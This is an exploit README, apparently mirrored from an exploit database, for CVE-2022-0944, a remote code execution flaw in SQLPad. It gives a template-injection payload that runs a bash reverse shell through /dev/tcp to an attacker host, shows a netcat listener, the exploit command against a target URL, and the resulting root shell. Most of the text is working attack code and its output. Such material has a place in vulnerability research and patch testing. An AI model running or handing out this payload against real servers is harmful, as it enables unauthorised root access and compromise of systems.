Share
## https://sploitus.com/exploit?id=1C1FA7DD-5C3A-561C-8D0D-189F217C9911
# CVE-2022-0944 PoC
PoC for RCE in SQLPad.<br />
This example spawns a reverse shell, but the payload can be modified to run any command available by changing the command in the 'exec' call within the payload.<br />
payload = f"{{{{ process.mainModule.require('child_process').exec('/bin/bash -c \"bash -i >& /dev/tcp/{reverse_host}/{reverse_port} 0>&1\"') }}}}"

# requirements 
Python 3

# usage

1. Start a listener

```
┌──(kali㉿hammer)-[~/dev/cve-2022-0944]
└─$ nc -lvkp 7070
listening on [any] 7070 ...
```

2.  Run exploit

```
┌──(kali㉿hammer)-[~/dev/cve-2022-0944]
└─$ python poc-cve-2022-0944.py -u http://sqlpad.example.com/api/test-connection -a 10.10.11.208 -p 7070
[*] Running exploit against target: http://sqlpad.example.com/api/test-connection
[*] Assembling JSON with payload
[*] Submitting request...
[!] Exploit appears to have been successful.
[*] Done.

┌──(kali㉿hammer)-[~/dev/cve-2022-0944]
└─$
```

3. Check for a shell

```
┌──(kali㉿hammer)-[~/dev/cve-2022-0944]
└─$ nc -lvkp 7070
listening on [any] 7070 ...
connect to [10.10.11.208] from example.com [10.10.11.25] 45502
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@c184118df0a6:/var/lib/sqlpad# id
uid=0(root) gid=0(root) groups=0(root)
root@c184118df0a6:/var/lib/sqlpad#
```

# references
https://nvd.nist.gov/vuln/detail/CVE-2022-0944<br />
https://huntr.com/bounties/46630727-d923-4444-a421-537ecd63e7fb